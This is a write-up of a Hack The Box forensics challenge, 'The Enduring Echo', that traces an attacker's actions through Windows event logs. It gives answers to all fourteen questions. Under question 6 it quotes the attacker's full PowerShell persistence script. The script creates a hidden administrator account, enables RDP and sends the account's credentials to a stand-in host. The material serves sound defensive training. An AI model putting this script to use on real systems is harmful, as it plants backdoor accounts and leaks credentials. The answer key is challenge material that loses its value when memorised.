HTB: Holmes 2025 — The Enduring Echo

Description:

LeStrade passes a disk image artifacts to Watson. It’s one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.

Scenario Files

The_Enduring_Echo.zip - Kape Output - SHA256:6efc1b8f809016100f58beef650c83557966235d7b327f890713f296710436e0 We are going to use EvtxECmd.exe to combine all the .evtx (win logs files) together.

.\EvtxECmd.exe -d "D:\Users\p4n4\Downloads\The_Enduring_Echo\The_Enduring_Echo\C\Windows\System32\winevt\logs" --csv "D:\Users\p4n4\Downloads\The_Enduring_Echo\The_Enduring_Echo" --csvf evtx.csv

Flags

1. What was the first (non cd) command executed by the attacker on the host? (string)

Show solution

systeminfo

Analyzing the evtx.csv that has all the logs we check the ones with EventID 4688 (Process Creation). There we see the attacker executing commands with a strange redirect to 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1. First command is the answer.

2. Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)

Show solution

C:\Windows\System32\wbem\WmiPrvSE.exe

“Payload data 1” column on the same event.

3. Which remote-execution tool was most likely used for the attack? (filename.ext)

Show solution

wmiexec.py

Given the context we know the parent process and the command redirection to an admin share we can safely bet it is that.

4. What was the attacker’s IP address? (IPv4 address)

Show solution

10.129.242.110

Searing for other commands the attacker run, cmd.exe, we come across modification of the hosts file. That’s the attackers IP.

5. What is the first element in the attacker’s sequence of persistence mechanisms? (string)

Show solution

SysHelper update

Same idea we look later for the attacker’s moves and we see him creating a Scheduled Task with schtasks.

6. Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)

Show solution

C:\Users\Werni\Appdata\Local\JM.ps1

From the above command we can find the script path and actually we have in our KAPE output:

# List of potential usernames
$usernames = @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")

# Check for existing user
$existing = $usernames | Where-Object {
    Get-LocalUser -Name $_ -ErrorAction SilentlyContinue
}

# If none exist, create a new one
if (-not $existing) {
    $newUser = Get-Random -InputObject $usernames
    $timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
    $password = "Watson_$timestamp"

    $securePass = ConvertTo-SecureString $password -AsPlainText -Force

    New-LocalUser -Name $newUser -Password $securePass -FullName "Windows Update Helper" -Description "System-managed service account"
    Add-LocalGroupMember -Group "Administrators" -Member $newUser
    Add-LocalGroupMember -Group "Remote Desktop Users" -Member $newUser

    # Enable RDP
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
    Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null
}

7. What local account did the attacker create? (string)

Show solution

svc_netupd

We can guess the account from the above script, but a more correct approach is to check Event ID 4720.

8. What domain name did the attacker use for credential exfiltration? (domain)

Show solution

NapoleonsBlackPearl.htb

From the script is evident.

9. What password did the attacker’s script generate for the newly created user? (string)

Show solution

Watson_20250824160509

Here is the password creation:

$timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
$password = "Watson_$timestamp"

We get the timestamp in Event ID 4720 and by converting it to the local computer timezone we get the correct one. One way to find the local TZ is from the registry HKLM\TempHive\ControlSet001\Control\TimeZoneInformation using the SYSTEM hive from our KAPE output. We get the TZ is Pacific Standard Time.

10. What was the IP address of the internal system the attacker pivoted to? (IPv4 address)

Show solution

192.168.1.101

Looking further attacker’s moves anf EventID 4688 we find a command for portforwading that creates a proxy with netsh.

11. Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)

Show solution

9999

From the above command.

12. What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM......)

Show solution

HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

Google it.

13. What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)

Show solution

T1090.001

Look it up on Mitre ATT&CK framework

14. Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)

Show solution

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f

For this we need to check the \Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt.